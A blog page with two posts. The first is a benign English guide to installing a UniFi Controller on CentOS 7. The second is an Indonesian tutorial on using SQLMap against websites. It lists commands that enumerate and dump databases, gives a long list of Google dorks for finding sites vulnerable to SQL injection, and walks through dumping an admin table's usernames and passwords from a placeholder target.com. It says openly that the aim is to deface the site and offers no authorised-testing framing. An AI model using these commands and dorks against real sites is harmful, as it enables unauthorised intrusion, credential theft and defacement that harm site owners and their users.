Monday, September 21, 2020

Install Unifi on Centos

 From:Spacework community

Step 1: Build a CentOS 7 server

ISO can be obtained from the internet for free and works on Hyper V or ESX (any potentially others)

Step 2: Boot your server and SSH into it

Step 3: Disable SELinux and update the server:

sed -i /etc/selinux/config -r -e 's/^SELINUX=.*/SELINUX=disabled/g'
yum -y update
systemctl reboot

Step 4: Install EPEL Repo

yum -y install epel-release

Step 5: Install prerequisites

useradd -r ubnt
yum -y install mongodb-server java-1.8.0-openjdk unzip wget

Step 6: Download and Extract the Unifi Controller (latest version can be found on unifi website)

cd ~ && wget http://dl.ubnt.com/unifi/4.7.6/UniFi.unix.zip
unzip -q UniFi.unix.zip -d /opt
chown -R ubnt:ubnt /opt/UniFi

Step 7: Create Startup Script with Systemd

vi /etc/systemd/system/unifi.service
---
#
# Systemd unit file for UniFi Controller
#

[Unit]
Description=UniFi AP Web Controller
After=syslog.target network.target

[Service]
Type=simple
User=ubnt
WorkingDirectory=/opt/UniFi
ExecStart=/usr/bin/java -Xmx1024M -jar /opt/UniFi/lib/ace.jar start
ExecStop=/usr/bin/java -jar /opt/UniFi/lib/ace.jar stop
SuccessExitStatus=143

[Install]
WantedBy=multi-user.target
---

Step 8: Configure Firewalld

systemctl stop firewalld.service
vi /etc/firewalld/services/unifi.xml
---
<?xml version="1.0" encoding="utf-8"?>
<service version="1.0">
<short>unifi</short>
<description>UniFi Controller</description>
<port port="8081" protocol="tcp"/>
<port port="8080" protocol="tcp"/>
<port port="8443" protocol="tcp"/>
<port port="8880" protocol="tcp"/>
<port port="8843" protocol="tcp"/>
<port port="10001" protocol="udp"/>
<port port="3478" protocol="udp"/>
</service>
---

systemctl start firewalld.service
firewall-cmd --set-default-zone=home
firewall-cmd --permanent --zone=home --change-interface=eth0
firewall-cmd --permanent --zone=home --add-service=unifi

Step 9: Enable on Startup

systemctl enable unifi.service

Step 10: And to finish CLEANUP

rm -rf ~/UniFi.unix.zip
systemctl reboot

Step 11: Access to your new controller

to access the web UI for the controller just browse on the local network to Https://<IP OF SERVER>:8443 this can then be published externally if needed to allow for multiple sites to be connected to one controller

Tuesday, August 18, 2020

Utilisasi SQLMap



Berikup Kutipan penggunaan SQLmap yang saya peroleh melalui browsing di internet




 

Berikut adalah beberapa command penting di SQLMAP

 

Untuk melakukan scanning terhadap Target [URL]

./sqlmap.py -u[url]

 

Untuk mendapatkan informasi database Target [URL]

./sqlmap.py -u[url] –dbs

 

Untuk mendapatkan informasi table di database Target [URL]

./sqlmap.py -u [url] –tables -D [database]

 

Untuk mendapatkan informasi kolom didalam table yang ada didatabase Target [URL]

./sqlmap.py -u [url] –columns -T [table name] -D [databasename]

 

Untuk melakukan dump kolom, table dan database Target [URL]

./sqlmap.py -u [url] –dump –columns -T [table name] -D [databasename]

 

Untuk melakukan dump spesifik kolom Target [URL]

./sqlmap.py -u [url] –dump -C [column name] -T [table name] -D [database name]

 

 

Berikut Google Dork Strings untuk mempermudah dan menemukan website vurnerability atau yang rentan terhadap SQL injection :

 

inurl:item_id=

inurl:newsid=

inurl:trainers.php?id=

inurl:news-full.php?id=

inurl:news_display.php?getid=

inurl:index2.php?option=

inurl:readnews.php?id=

inurl:top10.php?cat=

inurl:newsone.php?id=

inurl:event.php?id=

inurl:product-item.php?id=

inurl:sql.php?id=

inurl:index.php?catid=

inurl:news.php?catid=

inurl:index.php?id=

inurl:news.php?id=

inurl:index.php?id=

inurl:trainers.php?id=

inurl:buy.php?category=

inurl:article.php?ID=

inurl:play_old.php?id=

inurl:declaration_more.php?decl_id=

inurl:pageid=

inurl:games.php?id=

inurl:page.php?file=

inurl:newsDetail.php?id=

inurl:gallery.php?id=

inurl:article.php?id=

inurl:show.php?id=

inurl:staff_id=

inurl:newsitem.php?num=

inurl:readnews.php?id=

inurl:top10.php?cat=

inurl:historialeer.php?num=

inurl:reagir.php?num=

inurl:Stray-Questions-View.php?num=

inurl:forum_bds.php?num=

inurl:game.php?id=

inurl:view_product.php?id=

inurl:newsone.php?id=

inurl:sw_comment.php?id=

inurl:news.php?id=

inurl:avd_start.php?avd=

inurl:event.php?id=

inurl:product-item.php?id=

inurl:sql.php?id=

inurl:material.php?id=

inurl:clanek.php4?id=

inurl:announce.php?id=

inurl:chappies.php?id=

inurl:read.php?id=

inurl:viewapp.php?id=

inurl:viewphoto.php?id=

inurl:rub.php?idr=

inurl:galeri_info.php?l=

inurl:review.php?id=

inurl:iniziativa.php?in=

inurl:curriculum.php?id=

inurl:labels.php?id=

inurl:story.php?id=

inurl:look.php?ID=

inurl:newsone.php?id=

inurl:aboutbook.php?id=

inurl:material.php?id=

inurl:opinions.php?id=

inurl:announce.php?id=

inurl:rub.php?idr=

inurl:galeri_info.php?l=

inurl:tekst.php?idt=

inurl:newscat.php?id=

inurl:newsticker_info.php?idn=

inurl:rubrika.php?idr=

inurl:rubp.php?idr=

inurl:offer.php?idf=

inurl:art.php?idm=

inurl:title.php?id=

inurl:news_view.php?id=

inurl:select_biblio.php?id=

inurl:humor.php?id=

inurl:aboutbook.php?id=

inurl:ogl_inet.php?ogl_id=

inurl:fiche_spectacle.php?id=

inurl:communique_detail.php?id=

inurl:sem.php3?id=

inurl:kategorie.php4?id=

inurl:news.php?id=

inurl:index.php?id=

inurl:faq2.php?id=

inurl:show_an.php?id=

inurl:preview.php?id=

inurl:loadpsb.php?id=

inurl:opinions.php?id=

inurl:spr.php?id=

inurl:pages.php?id=

inurl:announce.php?id=

inurl:clanek.php4?id=

inurl:participant.php?id=

inurl:download.php?id=

inurl:main.php?id=

inurl:review.php?id=

inurl:chappies.php?id=

inurl:read.php?id=

inurl:prod_detail.php?id=

inurl:viewphoto.php?id=

inurl:article.php?id=

inurl:person.php?id=

inurl:productinfo.php?id=

inurl:showimg.php?id=

inurl:view.php?id=

inurl:website.php?id=

inurl:hosting_info.php?id=

inurl:gallery.php?id=

inurl:rub.php?idr=

inurl:view_faq.php?id=

inurl:artikelinfo.php?id=

inurl:detail.php?ID=

inurl:index.php?=

inurl:profile_view.php?id=

inurl:category.php?id=

inurl:publications.php?id=

inurl:fellows.php?id=

inurl:downloads_info.php?id=

inurl:prod_info.php?id=

inurl:shop.php?do=part&id=

inurl:productinfo.php?id=

inurl:collectionitem.php?id=

inurl:band_info.php?id=

inurl:product.php?id=

inurl:releases.php?id=

inurl:ray.php?id=

inurl:produit.php?id=

inurl:pop.php?id=

inurl:shopping.php?id=

inurl:productdetail.php?id=

inurl:post.php?id=

inurl:viewshowdetail.php?id=

inurl:clubpage.php?id=

inurl:memberInfo.php?id=

inurl:section.php?id=

inurl:theme.php?id=

inurl:page.php?id=

inurl:shredder-categories.php?id=

inurl:tradeCategory.php?id=

inurl:product_ranges_view.php?ID=

inurl:shop_category.php?id=

inurl:transcript.php?id=

inurl:channel_id=

inurl:aboutbook.php?id=

inurl:preview.php?id=

inurl:loadpsb.php?id=

inurl:pages.php?id=




perintah "-u" adalah "URL" target kita yang akan di eksekusi oleh sqlmap. perintah "--dbs" diatas adalah sqlmap akan berusaha mencari database dari web target kita tadi.

 

nah sekarang kita tunggu beberapa saat dan biarkan sqlmap bekerja sampai sqlmap menemukan database dari target kita. setelah bebearap saat sqlmap telah berhasil menemukan nama database dari target kita. asiikk !!!

 

saya umpamakan sqlmap berhasil mendapatkan 2 nama database yaitu

 

information_schema

my_db

 

langkah selanjutnya yang akan kita lakukan adalah mengintip table yang ada di dalam database tersebut, tapi database yang mana ? hmmmm sepertinya saya lebih tertarik sama database yang bernama "my_db".!! loh kenapa? mungkin feeling aja :-p

 

sekarang kita ketikkan lagi perintah ini :

 

 ./sqlmap.py -u https://www.target.com/index.php?id=7 -D my_db --tables

 

karena saya capek mengetikkan contoh untuk linux dan windows, jadi saya akan mengetikkan 1 contoh saja, bagi pengguna linux harus diawali dengan tanda "/" sebelum comand sedangkan di windows tidak di pakai alias langsung aja "sqlmap.py -u bla...bla...bla.."

 

ok next step, setelah kita tunggu beberapa saat ternyata sqlmap menemukan table yang ada di dalam database "my_db". Saya umpamakan table-table tersebut adalah sebagai berikut :

 

admin

members

item

 

nah karena saya ingin melakukan deface, maka saya akan membuka isi dari table admin tersebut. langsung aja kita ketikkan di terminal atau CMD perintah ini :

 

 ./sqlmap.py -u https://www.target.com/index.php?id=7 -D my_db -T admin --columns

 

lalu enter dan tunggu beberapa saat, dan kita mendapati "column" dari "table" admin tadi. saya umpamakan nama column nya :

 

ID

username

password

email_address

country

 

disini saya akan mengambil informasi dari dalam "column" admin tadi, yang ingin saya intip adalah "username","password",dan "email_address". Maka saya akan kembali mengetikkan perintah :

 

 ./sqlmap.py -u https://www.target.com/index.php?id=7 -D my_db -T admin -C username,password,email_address --dump

 

dan hasilnya saya mendapati sebagai berikut :

 

admin:123456:admin@target.com

 

ini artinya :

 

admin = username

123456 = password

admin@target.com = email_address